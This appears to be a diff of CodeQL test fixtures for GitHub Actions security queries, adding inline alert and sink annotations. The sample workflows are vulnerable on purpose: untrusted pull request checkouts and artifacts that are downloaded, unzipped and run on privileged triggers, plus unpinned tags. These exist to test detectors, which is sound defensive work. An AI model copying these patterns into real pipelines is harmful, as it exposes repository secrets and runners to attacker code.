-#select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref index f924f8fe750c..c4a686750f37 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref index 6284c786b3ae..67d2bf06c396 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index bbbcc5aaa791..e3b1c4047f8a 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -16,7 +16,7 @@ jobs: ${{ 1 == 2 || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ 1 == 2 }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ 1 == 2 }} + if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ 1 == 2 || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/high] - name: Test 9 if: '${{ 1 == 2 }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{1 == 2 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.event_name }} == 'foo' + if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml index 8b863037e29b..10688938a010 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -16,7 +16,7 @@ jobs: ${{ github.actor == "foo" || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ github.actor == "foo" }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ github.actor == "foo" || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical] - name: Test 9 if: '${{ github.actor == "foo" }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{ github.actor == 111 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.actor }} == 'foo' + if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ github.actor }} != "" + if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.actor == 'foo' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref index 823f802a70f2..0c665471cafc 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref index f12135bd1b88..546bb9dd0c9a 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index cd4f0fe660aa..47151cec6dea 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -8,6 +8,6 @@ runs: with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 - - run: echo "foo" + - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical] shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml index 4241647d3e11..ad2a67b14bb3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml index 0c2059521020..ac4364695ee4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip -d /tmp/artifacts shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml index 782505cc698d..db50d733137b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml @@ -2,5 +2,5 @@ name: Composite unpinned tag test runs: using: "composite" steps: - - uses: foo/bar@v2 + - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml index 08a25646d6ae..369412a9c4d1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml @@ -16,11 +16,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml index 7eaee9fa6d38..42322833ce72 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -8,12 +8,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - id: pr_number + - id: pr_number # $ Alert[actions/artifact-poisoning/critical] run: | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) - echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml index f8d3736dba51..44e8a18d733f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -29,13 +29,13 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip -d sonarcloud-data ls -a sonarcloud-data - name: Run command run: - ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index aa884b7eca74..953d06f55c71 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -29,12 +29,12 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip ls -a sonarcloud-data - name: Run command run: - python foo/x.py + python foo/x.py # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index e73548895d37..81f42aa335b7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml path: foo - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - sh foo/cmd + sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ac970fff8404..ca69571fab22 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml - - name: Run command - run: sh cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: sh cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index 0e7c6f97cf5d..d08b18147fe8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index 7a837ee42d2c..a573db866bda 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index 39ec063c7b64..b40091d7808f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index 905a4eaccb17..b4319fd42f99 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index afa3e15132e3..645fe636d3e6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command - run: ./foo/cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index d3100d46edc7..24fef012e0e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command - run: ./cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 8cb380ae0436..4430b91fba94 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact + - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] run: | - sed -f config foo.md > bar.md + sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 399adf3dff77..5a6bf1d62254 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] bash script.sh - uses: actions/upload-artifact@v4 with: @@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py + - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index af9f01b572f1..184661fda499 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact + - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index e35bc73c3bda..806b99204678 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 + - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps - - run: make snapshot + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index f970a3fa1979..6498802afc9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install \ No newline at end of file + - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 28ffab637f03..7093027c4d91 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} + - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 + - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: + test: # $ Sink[actions/untrusted-checkout/critical] permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} + - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage + - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ 